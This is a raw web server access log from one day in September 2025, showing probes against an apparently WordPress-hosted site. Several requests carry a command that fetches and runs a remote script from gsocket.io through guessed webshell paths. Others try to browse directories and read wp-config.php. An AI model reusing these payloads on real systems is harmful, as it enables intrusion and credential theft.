20.39.200.60 - - [14/Sep/2025:18:47:54 +0000] "GET //wp-content/plugins/fix/up.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
43.153.86.78 - - [14/Sep/2025:19:02:45 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
104.28.240.85 - - [14/Sep/2025:19:05:37 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
104.28.240.85 - - [14/Sep/2025:19:05:38 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
104.28.240.85 - - [14/Sep/2025:19:05:39 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
104.28.240.85 - - [14/Sep/2025:19:05:41 +0000] "GET /q1.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
43.153.19.83 - - [14/Sep/2025:19:18:55 +0000] "GET /?path=/home/marvidson/public_html/firstenergycrude.com HTTP/1.1" 200 51865 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
207.211.158.76 - - [14/Sep/2025:19:22:36 +0000] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:22:40 +0000] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:23:30 +0000] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:23:36 +0000] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:23:41 +0000] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:23:57 +0000] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:24:02 +0000] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:24:09 +0000] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:24:14 +0000] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:25:13 +0000] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:25:20 +0000] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:25:30 +0000] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
207.211.158.76 - - [14/Sep/2025:19:25:36 +0000] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 52570 "-" "python-requests/2.32.3"
43.128.156.124 - - [14/Sep/2025:19:27:57 +0000] "GET /?path=/home/marvidson/public_html/wp-content HTTP/1.1" 200 25701 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
122.51.104.231 - - [14/Sep/2025:19:36:42 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.157.80 - - [14/Sep/2025:19:42:41 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-config.php&path=/home/marvidson/public_html HTTP/1.1" 200 15950 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
@ Telegram